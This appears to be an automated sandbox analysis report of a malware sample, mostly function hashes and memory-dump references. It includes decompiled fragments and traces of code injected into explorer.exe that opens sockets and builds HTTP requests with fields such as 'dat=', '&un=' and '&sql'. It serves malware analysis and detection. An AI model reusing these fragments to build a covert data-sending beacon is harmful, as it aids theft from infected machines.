Instruction Fuzzy Hash: 29D017726142187BD620EB99CC85FD777ACDF487A0F0181A9BA1C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 00A7967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A79694

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9081d528d11faab3506e2fdcf1a5960146cd2edc0f1562032dd924b591d1933b
Instruction ID: 075666ac5fee5e84ca4930b771dafd8636a1d90ac4b24460b794a12b5f4179bb
Opcode Fuzzy Hash: 9081d528d11faab3506e2fdcf1a5960146cd2edc0f1562032dd924b591d1933b
Instruction Fuzzy Hash: 0BB092B2A024C5CAEB11F7B08A08F2B7A00BBE0741F26C162E2060685A4778C491F6B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00416CA5, Relevance: 7.6, Strings: 6, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00416CA5(void* __eax, void* __ebx, void* __edx, void* __esi) {
				void* _t52;
				intOrPtr _t57;
				void* _t63;
				void* _t67;
				void* _t70;
				void* _t73;

				_t52 = __ebx - 1;
				if(_t52 != 0) {
					 *0xd3d93ec0 =  *0xd3d93ec0 + 0xd3d93ec0;
					 *0xFFFFFFFFD3D93E4B =  *((intOrPtr*)(0xffffffffd3d93e4b)) + __edx;
					 *0xd3d93ec0 =  *0xd3d93ec0 + 0xffffffffd3d93ecc;
					_t63 = _t52 + 0x9c38;
					 *((intOrPtr*)(_t70 - 0x18)) = 0x6e6b6e55;
					 *((intOrPtr*)(_t70 - 0x14)) = 0x6e776f;
					_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t52 + 0xcb8))))( *((intOrPtr*)(0xffffffffd3d93ecc))());
					if(_t67 != 0) {
						if(_t67 > 0x40) {
							 *((char*)(_t52 + 0xda7)) = 0;
							_t67 = 0x40;
						}
					} else {
						_t13 = _t70 - 0x18; // 0x6e6b6e55
						E0041B9B0(_t52 + 0xd68, _t13, 8);
						_t73 = _t73 + 0xc;
						_t67 = 7;
					}
					 *((intOrPtr*)(_t70 - 8)) = 0xa0d0a0d;
					 *((char*)(_t70 - 4)) = 0;
					 *((intOrPtr*)(_t70 - 0x10)) = 0x74736f48;
					 *((short*)(_t70 - 0xc)) = 0x203a;
					 *((char*)(_t70 - 0xa)) = 0;
					E0041B9B0(_t63, _t70 - 0x10, 7);
					E0041B9B0(_t63 + 6, _t52 + 0xd68, _t67);
					_t24 = _t70 - 8; // 0xa0d0a0d
					 *((char*)(_t67 + _t63 + 6)) = 0;
					E0041BDB0(_t63, _t24, 5);
					_t27 = _t70 + 0x10; // 0x74736f48
					_t28 = _t70 + 0xc; // 0x203a
					_t57 =  *_t28;
					_t30 = _t63 + 0xa; // 0x11
					E0041B9B0(_t67 + _t30, _t57,  *_t27);
					 *((intOrPtr*)(_t52 + 0x116883)) =  *((intOrPtr*)(_t52 + 0x116883)) + _t57;
					 *((intOrPtr*)(_t52 + 0x6a50104d)) =  *((intOrPtr*)(_t52 + 0x6a50104d)) + _t57;
					_push(_t63);
					_push(_t52);
					E004163C0();
					return 1;
				} else {
					asm("scasd");
					return 0xd3d93ec0;
				}
			}

0x00416ca9
0x00416cb5
0x00416ce4
0x00416ce6
0x00416cec
0x00416cee
0x00416cf4
0x00416cfb
0x00416d0d
0x00416d11
0x00416d32
0x00416d34
0x00416d3b
0x00416d3b
0x00416d13
0x00416d15
0x00416d20
0x00416d25
0x00416d28
0x00416d28
0x00416d47
0x00416d4e
0x00416d52
0x00416d59
0x00416d5f
0x00416d63
0x00416d74
0x00416d7b
0x00416d80
0x00416d85
0x00416d8a
0x00416d8d
0x00416d8d
0x00416d92
0x00416d97
0x00416d9b
0x00416da1
0x00416dad
0x00416dae
0x00416daf
0x00416dc2
0x00416cb7
0x00416cbd
0x00416cc9
0x00416cc9

Strings

Host, xrefs: 00416D52
, xrefs: 00416D7B, 00416D7E
: , xrefs: 00416D59
Unknown, xrefs: 00416D15, 00416D18
: , xrefs: 00416D8D, 00416D91
Host: , xrefs: 00416D8A, 00416DA2, 00416D90

Memory Dump Source

Source File: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: $: $: $Host$Host: $Unknown
API String ID: 0-3527920956
Opcode ID: bf7ccf08db32a97b6c15b9e457e9413b11a2b427f3376b50d343343187a31781
Instruction ID: 82fd0ae45538dfb11855b78220480368058ac4f4cd02f4aee66c93ce6f9e1694
Opcode Fuzzy Hash: bf7ccf08db32a97b6c15b9e457e9413b11a2b427f3376b50d343343187a31781
Instruction Fuzzy Hash: 6C21E3B2904308ABDB11CF94C881BEFB7B8EF85304F04859EF9149B241D774AA45C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 00407AFA, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113afeb4b156c6b710c5d7ba6d5bad6445b57283c5956277851faa79f7093bcd
Instruction ID: dd60cd1329414cb5e7cbc4c471d0c9e5d320a4b6e4adf2e185a6296c73be67ae
Opcode Fuzzy Hash: 113afeb4b156c6b710c5d7ba6d5bad6445b57283c5956277851faa79f7093bcd
Instruction Fuzzy Hash: E1C08037F5D19847D5604D5C74941F0FB74DB4313EF2423EBD8849B9018453DD91628C

Uniqueness

Uniqueness Score: -1.00%

Function 00A798A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 353c54cbc7e11baf624d351d044492946d381df38876afa8fbe7a341f7fb6bb3
Instruction ID: b62b3e13bb143710554aed686444bd470537e95bdb7b1543d6e1eab8498c8a1c
Opcode Fuzzy Hash: 353c54cbc7e11baf624d351d044492946d381df38876afa8fbe7a341f7fb6bb3
Instruction Fuzzy Hash: 2F9002A130100402D20271698414A060109D7D1385F91C022E1414559D86658953F272

Uniqueness

Uniqueness Score: -1.00%

Function 00A79820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4aabd06fe520e12eacabd933057206b1a0502131d65eaca9da891d3ecfadd65
Instruction ID: dcced21b81fbc73d2b0a61cfd00c155fcc39ec34b08c9aafc7807eb73ee64670
Opcode Fuzzy Hash: f4aabd06fe520e12eacabd933057206b1a0502131d65eaca9da891d3ecfadd65
Instruction Fuzzy Hash: 989002B124100402D24171698404A060109A7D0381F91C022E0414558E86958A56FBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 450bf0e526ff129522149708fd50a0283cb3aecdcc8e2683576f1c42d57fc214
Instruction ID: 6a707b12bfd93a9ff2e36ff973e7fa4dfa382b8577017d0fa0b7e2f53d95bd3d
Opcode Fuzzy Hash: 450bf0e526ff129522149708fd50a0283cb3aecdcc8e2683576f1c42d57fc214
Instruction Fuzzy Hash: 3B9002E1601140434640B16988048065115A7E1341391C131E0444564C86A88855E3A5

Uniqueness

Uniqueness Score: -1.00%

Function 00A795F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4277c36d9a902f1865ed5d2b4e90e95f6447121ab3d7ef63a2bc77abf119e44
Instruction ID: 48bbbb9bdd705420c5b8ebe29f0dd274ed210a6db274381e5b2fc88d8e11dbe6
Opcode Fuzzy Hash: f4277c36d9a902f1865ed5d2b4e90e95f6447121ab3d7ef63a2bc77abf119e44
Instruction Fuzzy Hash: 2D9002B120100802D20471698804A86010597D0341F51C021E6014659E96A58891B271

Uniqueness

Uniqueness Score: -1.00%

Function 00A799D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a81480f0e9f41758f78f24e6e523d16c5897155b550d2dddad9888244a78360
Instruction ID: 34d37326f516e5607d782d1fe8229599272639988a3498bd923ab09b27e27edc
Opcode Fuzzy Hash: 1a81480f0e9f41758f78f24e6e523d16c5897155b550d2dddad9888244a78360
Instruction Fuzzy Hash: BC9002E121100042D20471698404B06014597E1341F51C022E2144558CC5698C61A265

Uniqueness

Uniqueness Score: -1.00%

Function 00A79520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b5b9a24d7fa13c37c5ba4b4dff13a49d626c27a988b92b9e482b5b2a46e3ee5
Instruction ID: c240ab73e79ea2010d4fb3afab0116bdc824ead09356eb9d832e79b20a8ad1c7
Opcode Fuzzy Hash: 9b5b9a24d7fa13c37c5ba4b4dff13a49d626c27a988b92b9e482b5b2a46e3ee5
Instruction Fuzzy Hash: 609002E1201140924600B269C404F0A460597E0341B51C026E1044564CC5658851E275

Uniqueness

Uniqueness Score: -1.00%

Function 00A7AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 119cef867baacc3fd2759cf8d38285c2ddf9b87e391f3ee38d9a6f431846c35c
Instruction ID: 046e021b1711e99d6bfd98aed7cd15e30c6b5e60e6117480fa3c6e6738842c37
Opcode Fuzzy Hash: 119cef867baacc3fd2759cf8d38285c2ddf9b87e391f3ee38d9a6f431846c35c
Instruction Fuzzy Hash: 549002B1A0500012924071698814A464106A7E0781B55C021E0504558C89948A55A3E1

Uniqueness

Uniqueness Score: -1.00%

Function 00A79560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f31a99efc88872d3ee2cdaac0be4641c1c9550c5563b03b1f08ce81b87d5ac8f
Instruction ID: ac726f01424235b334d0c1dab7c33b505f12efc135f0fd41feb823e1ab704b51
Opcode Fuzzy Hash: f31a99efc88872d3ee2cdaac0be4641c1c9550c5563b03b1f08ce81b87d5ac8f
Instruction Fuzzy Hash: A29002A5221000020245B569460490B0545A7D6391391C025F1406594CC6618865A361

Uniqueness

Uniqueness Score: -1.00%

Function 00A79950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 246110557f6d50b39c77ecf8de650e3e309b30061e65c046370749ab4c997768
Instruction ID: c1db7e7b8feaf3daf2b0051721d8523b5abbe3135f17b95e7e263cdffb1d643f
Opcode Fuzzy Hash: 246110557f6d50b39c77ecf8de650e3e309b30061e65c046370749ab4c997768
Instruction Fuzzy Hash: 0E9002E120140403D24075698804A07010597D0342F51C021E2054559E8A698C51B275

Uniqueness

Uniqueness Score: -1.00%

Function 00A79A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58bb7c6c42a8e0f77916525a85afb810c27520643c780f3e8359f6bf43cbcc75
Instruction ID: 335eb633a31ed040e25f9b7a56df5c44bdee56947f98fdb0e7be116b21645869
Opcode Fuzzy Hash: 58bb7c6c42a8e0f77916525a85afb810c27520643c780f3e8359f6bf43cbcc75
Instruction Fuzzy Hash: 739002A120144442D24072698804F0F420597E1342F91C029E4146558CC9558855A761

Uniqueness

Uniqueness Score: -1.00%

Function 00A796D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6278f69b85018a45ef0e64f3b3f24830a27238db9d10ce9999c6e21bb1c6e145
Instruction ID: 85716c00dee22d1ee0708eaed247650e0fb0890822eb8c53b6a7034ceebe5590
Opcode Fuzzy Hash: 6278f69b85018a45ef0e64f3b3f24830a27238db9d10ce9999c6e21bb1c6e145
Instruction Fuzzy Hash: B49002B120100842D20071698404F46010597E0341F51C026E0114658D8655C851B661

Uniqueness

Uniqueness Score: -1.00%

Function 00A79A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceeac6bd202711b0dfd7ebec2a354e43f4edea32000fb1edfde5816370c1cf6d
Instruction ID: d5563b1584e0946a31aca5d197699af47ebd2da9c39b630c6cbe732bc1abdeeb
Opcode Fuzzy Hash: ceeac6bd202711b0dfd7ebec2a354e43f4edea32000fb1edfde5816370c1cf6d
Instruction Fuzzy Hash: 5C9002B120140402D20071698808B47010597D0342F51C021E5154559E86A5C891B671

Uniqueness

Uniqueness Score: -1.00%

Function 00A79610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c117c1131f998b7b688df5d7fe69942bfb535414509a0c2c91054beebb9a6759
Instruction ID: 3a3ad8985c3aab35c4ef9adf691518962a276f5ebdf2f13c6301ffe30fe0401f
Opcode Fuzzy Hash: c117c1131f998b7b688df5d7fe69942bfb535414509a0c2c91054beebb9a6759
Instruction Fuzzy Hash: 209002B160500802D25071698414B46010597D0341F51C021E0014658D87958A55B7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00A79650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23f4c620a1efb53e3d38aaab631a7bbddd984426f7da46818750583528dff8d4
Instruction ID: 655ff1ec3444b530703d60d07433b24da8129784644cd2e6d6243c2caa77cd17
Opcode Fuzzy Hash: 23f4c620a1efb53e3d38aaab631a7bbddd984426f7da46818750583528dff8d4
Instruction Fuzzy Hash: B99002B120504842D24071698404E46011597D0345F51C021E0054698D96658D55F7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a68e703ff53cf2ecabf7455670388061747ab0f1ab3a8826f56868e7f7db620
Instruction ID: e334af5407075647b46607f7ad95a2e1a5185fd4da9851cf72801d892ccf024f
Opcode Fuzzy Hash: 9a68e703ff53cf2ecabf7455670388061747ab0f1ab3a8826f56868e7f7db620
Instruction Fuzzy Hash: 669002B120144002D2407169C444A0B5105A7E0341F51C421E0415558C86558856E361

Uniqueness

Uniqueness Score: -1.00%

Function 00A79FE0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 197fee88ef365f873ee17557c4eea76a7bb0d0c3055905971cf713f292f1bd24
Instruction ID: 22b98db94d97d05b64dff8492b09e897a3afd4e009e7e977c46eb66385af8250
Opcode Fuzzy Hash: 197fee88ef365f873ee17557c4eea76a7bb0d0c3055905971cf713f292f1bd24
Instruction Fuzzy Hash: 3C9002B131114402D2107169C404B06010597D1341F51C421E081455CD86D58891B262

Uniqueness

Uniqueness Score: -1.00%

Function 00A79B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfa181bb39f4629f0b595c6a53a89e8144e032a07718be0aa7e72bb04bf2fa27
Instruction ID: 2fc5057426bbf2ff93b8013079560e18ec5524ff9b530b4960f6558463257ce8
Opcode Fuzzy Hash: cfa181bb39f4629f0b595c6a53a89e8144e032a07718be0aa7e72bb04bf2fa27
Instruction Fuzzy Hash: D69002A124100802D2407169C414B070106D7D0741F51C021E0014558D86568965B7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00A79670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 4cdb02949def410171f693789a897584e6194dd5af0cccb9ad0dcc2e884b352e
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00ACFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00ACFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00A7CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00AC5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00AC5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x00acfdda
0x00acfde2
0x00acfde5
0x00acfdec
0x00acfdfa
0x00acfdff
0x00acfe0a
0x00acfe0f
0x00acfe17
0x00acfe1e
0x00acfe19
0x00acfe19
0x00acfe19
0x00acfe20
0x00acfe21
0x00acfe22
0x00acfe25
0x00acfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ACFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00ACFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00ACFE01

Memory Dump Source

Source File: 00000001.00000002.293332181.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 15ec9d7e4358895fcb813c20ba7356081ec63d52a86907fc98fba4521de57699
Instruction ID: f4639daaad2b3cb24933ef68db7a49cdc6e0283342dfc1431e83614d56e4d072
Opcode Fuzzy Hash: 15ec9d7e4358895fcb813c20ba7356081ec63d52a86907fc98fba4521de57699
Instruction Fuzzy Hash: DEF02B32600601BFDA201A55DD06F63BF6BEB44730F254728F628565E2DA62FCB097F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 3472 Parent PID: 5536 explorer.exeCOMMON

Executed Functions

Function 06D537A2, Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 814networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 06D5394F
setsockopt.WS2_32 ref: 06D54051
recv.WS2_32 ref: 06D5407A

Strings

&un=, xrefs: 06D53D12
: cl, xrefs: 06D53B59
GET , xrefs: 06D53B39
dat=, xrefs: 06D53AB1
Co, xrefs: 06D53B44
ose, xrefs: 06D53B60
tion, xrefs: 06D53B52
nnec, xrefs: 06D53B4B
&sql, xrefs: 06D53C92
&br=, xrefs: 06D53D2A

Memory Dump Source

Source File: 00000003.00000002.511411283.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 4b2fe0233347d3cd54feefe984417fbf885b6bb6361caca4e04029d55d1042f4
Instruction ID: c441bf7370bd97e3267cd14aca1b05e626bfcfdcb3a71310927654d53970a584
Opcode Fuzzy Hash: 4b2fe0233347d3cd54feefe984417fbf885b6bb6361caca4e04029d55d1042f4
Instruction Fuzzy Hash: 5552B631618B088FCBA9EF68D4847E9B7E1FB54300F52452ED8AFC7542EE30A545CB96

Uniqueness

Uniqueness Score: -1.00%

Function 06D52A52, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL ref: 06D52C69

Strings

`, xrefs: 06D52C3D

Memory Dump Source

Source File: 00000003.00000002.511411283.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
Instruction ID: c97bcd425f0619993f8f199ea87d81e28e82ef101632200b39911285e3ef1522
Opcode Fuzzy Hash: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
Instruction Fuzzy Hash: 36226E70A18A099FCB99EF68C4986AEF7F1FB98301F41022ED85ED7650DB30E555CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06D50058, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 06D50047

Strings

esoc, xrefs: 06D50012
ket, xrefs: 06D5001A
clos, xrefs: 06D5000A

Memory Dump Source

Source File: 00000003.00000002.511411283.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: b4fb87445522e583bcac549958e7f136e318ec9509d59ce0862b2de2f6cfbb67
Instruction ID: 693ce06d197f918c3457247dbedb3c5bf3d4eca79839646adbdf4ad063e55710
Opcode Fuzzy Hash: b4fb87445522e583bcac549958e7f136e318ec9509d59ce0862b2de2f6cfbb67
Instruction Fuzzy Hash: 38F0287011CB484BCBC0EF189088B9AB7F0F79A354F98057DE84ECB609C77585468707

Uniqueness

Uniqueness Score: -1.00%

Function 06D4FFEC, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 06D50047

Strings

esoc, xrefs: 06D50012
ket, xrefs: 06D5001A
clos, xrefs: 06D5000A

Memory Dump Source

Source File: 00000003.00000002.511411283.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: 922cb2de92a9cc7462d3c41426373e6679178d31bd48408d8fc66b38d9251727
Instruction ID: a2a51925b021df0d6140a7b2516a8f5a899a5ff20cc47544e2df7f8dd33698ed
Opcode Fuzzy Hash: 922cb2de92a9cc7462d3c41426373e6679178d31bd48408d8fc66b38d9251727
Instruction Fuzzy Hash: 44F0907011CB088FCB80EF28D489BAAB7E0FB89315F5406ADE88ECB604C77585468707

Uniqueness

Uniqueness Score: -1.00%

Function 06D4FFF2, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 06D50047

Strings

esoc, xrefs: 06D50012
ket, xrefs: 06D5001A
clos, xrefs: 06D5000A

Memory Dump Source

Source File: 00000003.00000002.511411283.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
Instruction ID: a57f0eb4c0e71bd0bc4f116ff488b0279ba3b4dbf8bb6847ba2cc772beb1550b
Opcode Fuzzy Hash: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
Instruction Fuzzy Hash: 55F01770618B089FCB84EF18D488B6AB6E0FB89354F54466DA85ECB644C77589428B06

Uniqueness

Uniqueness Score: -1.00%

Function 06D4FF72, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 06D4FFD1

Strings

ect, xrefs: 06D4FFA1
conn, xrefs: 06D4FF9A

Memory Dump Source

Source File: 00000003.00000002.511411283.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
Instruction ID: 5a61af5d8fb9683294bc4117a1742d0e5555a94b5ee5345da6ac21590d47c3e0
Opcode Fuzzy Hash: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
Instruction Fuzzy Hash: 48012C70618A0C8FCBC4EF5CE488B55B7E0FB59314F1641AEE80DCB266CA74C9818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 06D4FF6E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 06D4FFD1

Strings

ect, xrefs: 06D4FFA1
conn, xrefs: 06D4FF9A

Memory Dump Source

Source File: 00000003.00000002.511411283.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 0e87c5066886d73f66ad042aa74cf2e6c0982b3a705251b8bd229a10c4884a4e
Instruction ID: 92da957678c0e7c97e54864b61143f1314e91891251a880e2395bb405d5570f7
Opcode Fuzzy Hash: 0e87c5066886d73f66ad042aa74cf2e6c0982b3a705251b8bd229a10c4884a4e
Instruction Fuzzy Hash: 6A015A70618A188FCB84EF5CA488B55B7E0FB59310F1645AAD84DCB266CA74C8868BC1

Uniqueness

Uniqueness Score: -1.00%

Function 06D4FDEF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 06D4FE51

Strings

sock, xrefs: 06D4FE19

Memory Dump Source

Source File: 00000003.00000002.511411283.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 35d02e8bf7b7ef43e9c2e6124d276c4e2bea41bc627b1cd2210aee80682eb4f6
Instruction ID: 9afb45c2691042781ea27be17411f6b487a906ba02f5994920e8dc0c6a5f3df2
Opcode Fuzzy Hash: 35d02e8bf7b7ef43e9c2e6124d276c4e2bea41bc627b1cd2210aee80682eb4f6
Instruction Fuzzy Hash: BB117C706187488FCB84EF1CA488B40BBE0EB59350F0645EED84DCF277C2B4C9828B92

Uniqueness

Uniqueness Score: -1.00%

Function 06D4FEF2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 06D4FF53

Strings

send, xrefs: 06D4FF1A

Memory Dump Source

Source File: 00000003.00000002.511411283.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
Instruction ID: ce41acd8aa07ad6d4ed4c9f4b253d70db3b04018f668f3565435c82f150a3bdd
Opcode Fuzzy Hash: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
Instruction Fuzzy Hash: 5E012570518A0C8FDBC4EF5CD448B1577E0EB58314F1645AED85DCB266C670D881CB81

Uniqueness

Uniqueness Score: -1.00%

